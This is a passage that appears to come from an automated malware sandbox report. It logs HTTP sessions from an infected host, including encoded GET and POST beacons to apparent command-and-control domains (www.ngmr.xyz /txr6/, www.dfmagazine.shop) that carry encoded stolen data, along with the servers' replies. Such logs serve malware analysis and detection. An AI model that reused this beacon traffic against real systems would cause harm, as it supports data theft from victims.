                                                                                  Data Ascii: bDniMm9IT4KLIaPbE7aU5OzoxqB54vu/nSr6M8DObMXQoImnaZ/50MQgusd7w1cJUcE5ieOvhbeFS1FHAdUY4cGV5K5X8Iz2r0ZyZNEx/2BV3pNKSgZpnlqqVY2ZttHqIXiPHcDbQmdy4WpHfysFraQGtyy5NdMulyMOTrXmG+OybZgnPxk5SXeqfvb1Bx+uoCqGxE/lHcvw7Pbg8CM6OSVWfscA/6vkfDzR035+2ImhOzbd/Q2


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  78192.168.11.204983484.32.84.3280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:43.014811039 CEST549OUTGET /7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:43.241939068 CEST1289INHTTP/1.1 200 OK
                                                                                  Server: hcdn
                                                                                  Date: Wed, 25 Sep 2024 07:59:43 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 10072
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  x-hcdn-request-id: 61e488ed2177afaa34558a25d80ad808-asc-edge4
                                                                                  Expires: Wed, 25 Sep 2024 07:59:42 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                  Sep 25, 2024 09:59:43.241961002 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                  Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                  Sep 25, 2024 09:59:43.241986036 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                  Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                  Sep 25, 2024 09:59:43.242016077 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                  Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                  Sep 25, 2024 09:59:43.242028952 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                  Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                  Sep 25, 2024 09:59:43.242041111 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                  Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                  Sep 25, 2024 09:59:43.242265940 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                  Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                  Sep 25, 2024 09:59:43.242280006 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                  Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                  Sep 25, 2024 09:59:43.242290974 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                  Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  79192.168.11.204983554.67.87.11080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:53.443715096 CEST798OUTPOST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 58 31 47 76 52 66 63 73 44 4a 6a 63 75 79 4f 6d 48 6b 49 44 72 39 54 42 42 2b 45 54 5a 30 2b 49 4e 42 64 78 2f 35 6d 61 52 62 66 6d 2f 54 74 7a 72 49 39 49 65 2f 56 4c 6b 42 52 41 58 6e 51 35 44 78 4b 6a 42 6e 42 32 54 67 2b 71 57 63 32 34 7a 6d 38 69 4b 42 71 55 58 5a 7a 42 51 4d 42 74 62 5a 36 66 56 38 63 32 34 75 51 30 6e 33 7a 66 61 75 4e 4a 68 70 39 7a 2f 45 6d 34 57 6d 77 37 6f 77 73 74 4e 77 79 51 78 74 45 4c 39 50 71 32 78 7a 35 56 73 34 2b 49 55 31 6e 71 34 48 34 34 2b 2b 79 2f 58 70 39 64 71 31 36 4b 5a 55 69 76 4e 72 55 70 51 3d 3d
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
                                                                                  Sep 25, 2024 09:59:53.614177942 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:19 GMT
                                                                                  X-Varnish: 1105031287
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  80192.168.11.204983654.67.87.11080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:56.145169973 CEST818OUTPOST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
                                                                                  Sep 25, 2024 09:59:56.315361977 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:21 GMT
                                                                                  X-Varnish: 1105031295
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  81192.168.11.204983754.67.87.11080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:58.847220898 CEST2578OUTPOST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 59 2b 49 65 35 64 78 63 52 6d 59 52 62 66 76 66 54 70 33 72 4a 2f 49 65 72 76 4c 68 73 73 41 52 66 51 34 69 68 4b 32 53 66 4f 2b 44 67 34 75 57 63 35 34 7a 6d 54 69 4f 6c 75 55 58 74 5a 42 55 67 42 73 70 42 36 4f 56 38 62 71 6f 75 51 30 6e 33 76 66 61 76 65 4a 68 77 67 7a 37 68 72 37 6c 4f 77 37 4a 51 73 76 75 49 78 48 68 74 41 44 64 4f 65 78 68 37 70 4e 74 63 4a 59 6d 39 5a 74 6f 76 7a 6e 34 71 32 79 57 70 39 66 75 52 41 4f 62 39 33 6e 2f 69 7a 36 5a 2f 6f 57 73 34 67 77 78 30 76 75 75 57 67 6f 32 66 78 50 65 67 59 41 62 2f 44 6e 6c 79 70 62 78 79 6f 2b 62 51 6c 2b 38 76 51 71 2f 62 55 51 61 74 70 46 57 33 50 7a 49 53 50 46 67 73 63 45 6c 43 35 46 4e 43 4d 35 73 48 36 32 33 42 39 36 6c 76 42 36 46 32 4b 47 65 58 50 65 31 75 45 39 4b 34 74 35 79 4b 49 73 56 5a 4b 2f 73 56 61 76 6a 76 7a 59 74 30 77 69 33 6e 34 31 4f 72 41 36 6e 41 4b 2b 4e 70 2b 77 41 66 41 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrY+Ie5dxcRmYRbfvfTp3rJ/IervLhssARfQ4ihK2SfO+Dg4uWc54zmTiOluUXtZBUgBspB6OV8bqouQ0n3vfaveJhwgz7hr7lOw7JQsvuIxHhtADdOexh7pNtcJYm9Ztovzn4q2yWp9fuRAOb93n/iz6Z/oWs4gwx0vuuWgo2fxPegYAb/Dnlypbxyo+bQl+8vQq/bUQatpFW3PzISPFgscElC5FNCM5sH623B96lvB6F2KGeXPe1uE9K4t5yKIsVZK/sVavjvzYt0wi3n41OrA6nAK+Np+wAfAx93u5MbdkFr5VbJmcTeWor6g1Gou+SXSQIkt/8m+KYxgFAuJpcEp+pl+9F4xC7SBpfDgmyJqfy6y9pRB02xBS6kgJnIOpAxSuxX6pFSWYS1XCzZNMtLId3Vkyz5KxoVnbwHbKB8FmGQj1fWHfuATFF+BAf+yWomXiOfWv+wcP1J7JwjH9a82waCvQxhijt+ZUM3xxPEzGPI3QzIZBZ7f45DbzmE6DQnRRQBODQaBxvVA46RfsojREeyaYEdFsL90keHRf8hLqgoJzXY3RXTNN/yv1Gf95U+wUH/eKLrGV3z6ja0bZSGnIaoyNsfHIYlNvaUWPca5qh0J2EY5lGSTkhnOCt7mkdUUO+E0m6bFkdd821Ttt3K7ruEBNKVvXUaASDAXpSL1U4RYi/3m8fK+p7R/l9xJICdkq1h1NNz5AW3TM+QYRT2Ky0nSq1jIs1a2ml/3x2h0ch8HUw+0vvJ6FwW1ISvdTyUK8JHqBuVXE8hcDIY54rTxfccaRYyyBbI59ec3Kwvd+2UmgldEua9dfIQn/pZumElQei9JlFoJj5xlaAer1tJXSXbzBXVHZl5q7gtk1ptbXv3BBSxm9rpJctyjShZZWZ5/uyhzLo84Rz/P/7olgYeg1X99os7gpL2Mjzd9Qerq7htoJ+nleTSwD1kt20w/FiSosJ [TRUNCATED]
                                                                                  Sep 25, 2024 09:59:58.847239017 CEST5156OUTData Raw: 34 33 43 54 59 2f 79 38 75 4c 32 56 4b 74 69 4b 41 2f 6e 5a 34 76 6f 73 30 36 39 6e 2b 43 79 66 75 72 76 54 34 52 2b 35 34 37 4e 51 50 61 37 31 35 6d 61 44 6e 50 2b 35 78 44 4f 56 4e 79 54 75 4a 34 63 6c 43 68 74 6e 6a 47 4e 55 53 79 34 53 6b 77
                                                                                  Data Ascii: 43CTY/y8uL2VKtiKA/nZ4vos069n+CyfurvT4R+547NQPa715maDnP+5xDOVNyTuJ4clChtnjGNUSy4Skwt7chhOQwDLTRf8S+EhqhgCDiNKi4cI//VuIfn6oKYuCVD1ChtHQYtFVmGyik2pVHGfqFRiPZ41weODFhfprAUT+l9TK5Eeqwe93RA5WuWLvqIZ0dMBoxnbAzZYx2yYeEimTgrD0KRvHtDzcFqv7nsyMEIE1sXW1MF
                                                                                  Sep 25, 2024 09:59:58.847286940 CEST233OUTData Raw: 56 63 55 33 65 49 70 33 67 6a 53 70 66 6e 62 42 2f 4b 46 79 6d 35 52 74 67 32 66 58 43 47 64 43 61 66 55 78 6d 38 38 48 41 34 74 41 4f 72 48 32 63 51 52 6c 61 4b 51 2f 53 6d 5a 4a 32 72 77 70 50 7a 37 72 62 33 74 77 56 52 44 6f 31 2b 59 5a 4c 76
                                                                                  Data Ascii: VcU3eIp3gjSpfnbB/KFym5Rtg2fXCGdCafUxm88HA4tAOrH2cQRlaKQ/SmZJ2rwpPz7rb3twVRDo1+YZLveVRqwiEwFBS6994AAoUN9eXNII5l4IPpc2jYCsAqFO6fvlGxGMukBf9PrHSVdsvUpkBqMqeT7gVZgiS+DPLYcl+cYjbgXOeAaaMmZwfikGKGf6v6T/dH7XiHudSN2c5GLLJ+BjuHJcN1yY7uHNJaQ==
                                                                                  Sep 25, 2024 09:59:59.018204927 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:24 GMT
                                                                                  X-Varnish: 1105031299
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  82192.168.11.204983854.67.87.11080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:01.547859907 CEST542OUTGET /txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:01.718249083 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:27 GMT
                                                                                  X-Varnish: 1105031301
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
